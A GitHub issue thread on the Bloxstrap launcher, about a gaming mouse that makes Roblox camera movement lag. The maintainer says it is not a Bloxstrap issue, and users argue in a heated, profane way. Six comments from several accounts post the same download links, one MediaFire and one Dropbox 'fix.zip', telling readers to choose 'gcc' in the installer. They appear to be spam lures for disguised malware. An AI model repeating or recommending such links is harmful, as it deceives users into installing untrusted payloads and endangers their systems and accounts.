### ISSUE TITLE
[REQ] Gaming mouse camera fix

### ISSUE THREAD

**Issue by JackWagon885** [pizzaboxer/bloxstrap#2751]
### Acknowledgement of preliminary instructions

- [X] I have read and acknowledged the preliminary instructions.

### What idea do you have?

When I use my gaming mouse, the camera movement is delayed. I don't know if this is an issue on Bloxstrap or Roblox's end, but it's super annoying & I was wondering if it could be fixed. This does not happen with my standard office mouse. My gaming mouse is a Gameball Thumb, & this issue has not happened before.

**Comment by pizzaboxer** [comment]
This likely sounds like a problem outside of Bloxstrap's scope. To verify, temporarily switch back to the original launcher, see if it happens there. https://github.com/pizzaboxer/bloxstrap/wiki/Switching-between-Roblox-and-Bloxstrap

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by JackWagon885** [comment]
man now I have to do work

**Comment by JackWagon885** [comment]
actually, I remember when it first happened I uninstalled bloxstrap & it still happened

**Comment by pizzaboxer** [comment]
Not a Bloxstrap issue then.

**Comment by JackWagon885** [comment]
yea, but could bloxstrap fix it?

**Comment by NabHeyka22** [comment]
read what pizzaboxer said
it's not a bloxstrap issue, so it's a roblox issue

**Comment by JackWagon885** [comment]
yea, but could bloxstrap fix it?

**Comment by NabHeyka22** [comment]
let me repeat this multiple times:
read what pizzaboxer said it's not a bloxstrap issue, so it's a roblox issue read what pizzaboxer said it's not a bloxstrap issue, so it's a roblox issue read what pizzaboxer said it's not a bloxstrap issue, so it's a roblox issue read what pizzaboxer said it's not a bloxstrap issue, so it's a roblox issue read what pizzaboxer said it's not a bloxstrap issue, so it's a roblox issue read what pizzaboxer said it's not a bloxstrap issue, so it's a roblox issue read what pizzaboxer said it's not a bloxstrap issue, so it's a roblox issue read what pizzaboxer said it's not a bloxstrap issue, so it's a roblox issue 
is that enough?

**Comment by JackWagon885** [comment]
read what I'm saying

I GET THAT IT'S A FUCKING ROBLOX ISSUE, BUT IS BLOXSTRAP ABLE TO FIX IT

**Comment by NabHeyka22** [comment]
N O

**Comment by JackWagon885** [comment]
o k
